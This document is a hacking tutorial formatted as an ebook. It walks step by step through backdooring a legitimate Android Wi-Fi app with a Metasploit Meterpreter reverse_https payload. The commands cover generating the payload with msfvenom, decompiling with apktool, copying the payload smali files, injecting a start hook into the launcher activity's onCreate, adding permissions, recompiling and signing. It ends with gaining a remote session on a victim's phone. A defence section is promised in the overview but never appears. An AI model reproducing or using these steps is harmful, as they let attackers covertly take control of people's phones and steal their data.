IND ANDROID_HACKING BY:-

SHUBHAM YADAV
[Document subtitle]
IND ANDROID_HACKING By:- Shubham Yadav

Attention Hackers!
When you read this book, we would absolutely LOVE to hear your comments on it.

 Is it useful?
 Is it well written?
 Did you find anything to correct?
 Is there anything missing?
 Is there anything you want to see more of?
 Is there anything you want to see less of?

Send your comments to shubhamyadav2468cyberexpert@gmail.com and mention the word “book”

in the subject header.

Thank you!

I AM CERTIFIED ETHICAL HACKER.

I AM CERTIFIED IN HACKING FIELD.

Published by Shubham Yadav

IND ANDROID_HACKING By:- Shubham Yadav

Table of Contents

Install Instructions
Quick Check………………………………………………………………………………………………………………….……………………..

Installation for Apktool

Linux………..…………………………………………………………………………………………………………………………………......….
Windows……….…………………………………………………………………………………………………………………………………….
Mac OS X………..…………………………………………………………………………………………………………………………..……….
Overview………………………………………………………………………………………………………………………………….………….

Generate the Meterpreter payload

Singles……..………………………………………………………………………………………………………………………………………….
Stagers……..…………………………………………………………………………………………………………………………..…………….
Stages………..………………………………………………………………………………………………………………………….…………….
Msfvenom VS MSFpayload…………….……………………………………………………………………………….……………………

Backdooring App
Decompile the payload and the original apk…………………………………………………………………….………………….
Copy The Payload Files…………………………………………………………………………………………………………………………
Hook injection inside “.SMALI CODE”…………..………………………………………………………………………………………
INJECT the NECESSARY PERMISSIONS……………..………………………………………………………………………..…………
RECOMPILE the ORIGINAL APK………………………………………………………………………………………………….…………
SIGN the APK……………….………………………………………………………………………………………………………………………

Meterpreter Session:
IND ANDROID_HACKING By:- Shubham Yadav

Install Instructions

Quick Check
1. Is Java 1.7 installed? If Yes go to step 2 or not go to step 3
2. Does executing java –version on command line / command prompt return 1.7?

3. If not, please install Java 7 and make it the default.

Installation for Apktool

Go to official page for Apktool: https://ibotpeaches.github.io/Apktool/install

Linux:
1. Download Linux wrapper script (Right click, Save Link As apktool )
2. Download apktool-2 (find newest here)
3. Make sure you have the 32bit libraries ( ia32-libs ) downloaded and installed by your linux
package manager, if you are on a 64bit unix system.
4. (This helps provide support for the 32bit native binary aapt, which is required by apktool)
5. Rename downloaded jar to apktool.jar
6. Move both files ( apktool.jar & apktool ) to /usr/local/bin (root needed)

7. Make sure both files are executable ( chmod +x )

8. Try running apktool via cli

We will also need some libraries and tools in the following steps, so I think it's better if you
install them right now.
To install the required libraries, enter this command at the console:
IND ANDROID_HACKING By:- Shubham Yadav

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

Windows:
1. Download Windows wrapper script (Right click, Save Link As apktool.bat )
2. Download apktool_2.2.0.jar (find newest here)
3. Rename downloaded jar to apktool.jar
4. Move both files ( apktool.jar & apktool.bat ) to your Windows directory (Usually
C://Windows )
5. If you do not have access to C://Windows , you may place the two files anywhere then
add that
directory to your Environment Variables System PATH variable.
6. Try running apktool via command prompt
Mac OS X:
1. Download Mac wrapper script (Right click, Save Link As apktool )
2. Download apktool-2 (find newest here)
3. Rename downloaded jar to apktool.jar
4. Move both files ( apktool.jar & apktool ) to /usr/local/bin (root needed)
5. Make sure both files are executable ( chmod +x )
6. Try running apktool via cli

Overview:
We know this tutorial is a little bit long, Let's me tell you what we are going to do here.
1.Generate the Meterpreter payload
2.Decompile the payload and the original apk
3.Get Clean apk file from any site
3.Copy the payload smali folder to the original apk
4.Inject the hook into the appropriate activity of the original apk
5.Inject the permissions in the AndroidManifest.xml le
6.Re-compile the original apk
7.Sign the apk using Jarsigner
8.Going to fake apk file on network
9.Run Meterpreter session
10.HOW TO DESCOVER IT ON YOUR NETWORK AND Defend Your self

Generate the Meterpreter payload

A payload in metapsloit refers to an exploit module. There are three different types of
payload modules in the Metasploit Framework: Singles, Stagers, and Stages. These different
types allow for a great deal of versatility and can be useful across numerous types of
scenarios. Whether or not a payload is staged, is represented by ‘/’ in the payload name. For
example, “windows/shell_bind_tcp” is a single payload with no stage, whereas
“windows/shell/bind_tcp” consists of a stager (bind_tcp) and a stage (shell).
IND ANDROID_HACKING By:- Shubham Yadav

Contents

1- Singles
2- Stagers
3- Stages

Singles:
Singles are payloads that are self-contained and completely standalone. A Single payload
can be something as simple as adding a user to the target system or running calc.exe.
These kinds of payloads are self-contained, so they can be caught with non-metasploit
handlers such as netcat.

Stagers:
Stagers setup a network connection between the attacker and victim and are designed to be
small and reliable. It is difficult to always do both of these well so the result is multiple
similar stagers. Metasploit will use the best one when it can and fall back to a less-preferred
one when necessary.

Windows NX vs NO-NX Stagers

 Reliability issue for NX CPUs and DEP

 NX stagers are bigger (VirtualAlloc)
 Default is now NX + Win7 compatible

Stages:
Stages are payload components that are downloaded by Stagers modules. The various
payload stages provide advanced features with no size limits such as Meterpreter, VNC
Injection, and the iPhone ‘ipwn’ Shell.

Payload stages automatically use ‘middle stagers’

 A single recv() fails with large payloads

 The stager receives the middle stager
 The middle stager then performs a full download
 Also better for RWX

Msfvenom VS MSFpayload
msfpayload is a command line instance of Metasploit that is used to generate and output all
of the various types of shellcode that are available in Metasploit. The most common use of
this tool is for the generation of shellcode for an exploit that is not currently in the
Metasploit Framework or for testing different types of shellcode and options before
finalizing an Exploit Module.
IND ANDROID_HACKING By:- Shubham Yadav

Msfvenom is the combination of payload generation and encoding. It replaced msfpayload

and msfencode on June 8th 2015.

So after understand what is payload Let’s Start Generate our payload by flowing this
command line:
msfvenom --platform android -p android/meterpreter/Payload_Type
LHOST=(IP_Address) LPORT=(Incoming_Port) -o meterpreter.apk

Explanation:
--platform: The platform of the payload (Android, Windows, Linux … )

-p: Payload to use.

LHOST: Your localhost IP Address

LPORT: Local Port / Incoming_Port

-o: path for output file and file name

Note: Replace Payload_Type by any of the following payloads available.

1.reversetcp
2.reverse_http
3.reverse_https

To see what payloads are available from Framework, you can do:

You can use any one you like, I'm going to use reverse_https as an example.

sudo msfvenom --platform android -p

android/meterpreter/reverse_https LHOST=192.168.56.100 LPORT=5555
-o meterpreter.apk

Replace IP_Address by the IP address to which the payload is going to connect back to, i.e
the IP address of the attacker's system. If you are going to perform this attack over a local
IND ANDROID_HACKING By:- Shubham Yadav

network (eg. if the victim and attacker are connected to the same WiFi hotspot), your Local
IP will su ce. To know what
your local IP is, run the command –

If you are going to perform this attack over the Internet, you have to use your public IP
address, and con gure your router properly (set up port forwarding) so that your system is
accessible from the Internet. To know your public IP, just google "My IP" and Google will
help you out.

Replace Incoming_Port with the port no. which you want to be used by the payload to
connect to your system. This can be any valid port except the reserved ones like port 80
(HTTP).
I'm going to use 5555 as an example.

So run the command using replacing the keywords with

Appropriate values and MSFVenom will generate a payload "meterpreter.apk" in the root
directory. Note that we spaced the output fille name using the "-o meterpreter.apk"
argument in the command, so if you like, you can name it anything else also.

Backdooring App
Decompile the payload and the original apk:
Now we have to decompile the APKs, for this we are going to use APKTool. It decompiles the
code to a fairly human-readable format and saves it in .smali files, and also successfully
extracts the .xml files. Assuming you have already

installed the latest apktool and also have the original apk le in the root directory, run the
following commands –

apktool d -o Desktop/meterpreter “Desktop/meterpreter.apk”

apktool d -o Desktop/FreeWiFiConnect “Desktop/FreeWiFiConnect.apk”

It will decompile the payload to "Desktop/meterpreter" and the

IND ANDROID_HACKING By:- Shubham Yadav

original apk to "Desktop/FreeWiFiConnect" directory.

Copy The Payload Files:

Now we have to copy the payload files to the original application folder. Through going to
"Desktop/meterpreter/smali/com/metasploit/stage" and copy all the .smali files whose
have name contains the word 'payload'.

Now paste them in "Desktop/FreeWiFiConnect/smali/com/metasploit/stage".

Note that this folder does not exists, so you have to create it.
IND ANDROID_HACKING By:- Shubham Yadav

Hook injection inside “.SMALI CODE”:

In the previous step, we just copied the payload codes inside the original apk, so that when
the original apk is recompiled, it will contain the payload files. But that doesn't mean that
the payload will be run. To ensure that the payload runs, we have to inject a hook in the
“FreeWiFiConnect” apk's .smali code.

Let search for activities sections code in the AndroidManifest.xml file, located inside the
"Desktop/FreeWiFiConnect" folder using any text editor.

You can use CTRL+F to search for an <activity> tag which contains both the lines –

<action android:name="android.intent.action.MAIN"/>

<category android:name="android.intent.category.LAUNCHER"/>

follow my screenshot I used vi editor

note this "android:name" attribute's value. In my case, as you can see from the previous
screenshot , it is "com.mentisco.freewificonnect.activity.SplashActivity".

This attribute showing us where we going to inject hook so you can change the dote with
slash and add .smali at the end follow screenshot

or using gedit

Now we have the name of the activity we want to inject the hook into, let's edit the .smali
code of that activity by “vi or gedit”

Now search for the following line in the smali code using CTRL+F –

;->onCreate(Landroid/os/Bundle;)V
IND ANDROID_HACKING By:- Shubham Yadav

When you locate it, paste the following code in the line next to it –

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

What we are doing here is, inserting a code which starts the payload alongside the existing
code which is executed when the activity starts. Now, save the edited smali file.

INJECT the NECESSARY PERMISSIONS:

If we do not mention all the additional permissions that our payload is going to need, it
cannot function properly. While installing an app, these permissions are shown to the user.
But most of the users don't care to read all those boring texts, so we do not have to worry
about that much.

These permissions are also listed in the previously encountered AndroidManifest file. So
let's open the AndroidManifest.xml of both the original app and the payload from the
respective folders. The permissions are mentioned inside <uses-permission> tag as an
attribute 'android:name'. Copy the additional permission lines from the Payload's
AndroidManifest to the original app's one. But be careful that there should not be any
duplicate.

After adding the additional ones from the Payload's AndroidManifest, my

Desktop/FreeWiFiConnect/AndroidManifest.xml looks like this:
IND ANDROID_HACKING By:- Shubham Yadav

RECOMPILE the ORIGINAL APK:

Now We just have to recompile the backdoored app into an installable apk. Run the
following command –

apktool b Desktop/FreeWiFiConnect

You will now have the compiled apk inside the "Desktop/FreeWiFiConnect/dist" directory.
But, we're still have one step to finish backdoored app called “sign apk”.
IND ANDROID_HACKING By:- Shubham Yadav

SIGN the APK:

This is also a very important step, as in most of the cases, an unsigned apk cannot be
installed.

In this case we are going to sign the apk using the default android debug key. Just run the
following command –

sudo java -jar sign.jar FreeWiFiConnect.apk

Be sure to replace the apk_path in the above command with the path to your backdoored
apk file.

Meterpreter Session:
Now After victim received backdoored app and he installed and run it in his phone, you can
get a working meterpreter session on his phone!

For more please let me know by mailing me on: - shubhamyadav2468cyberexpert@gmail.com.

Thank You……...

You can also visit my blog: - shubham2152003yadav.blogspot.in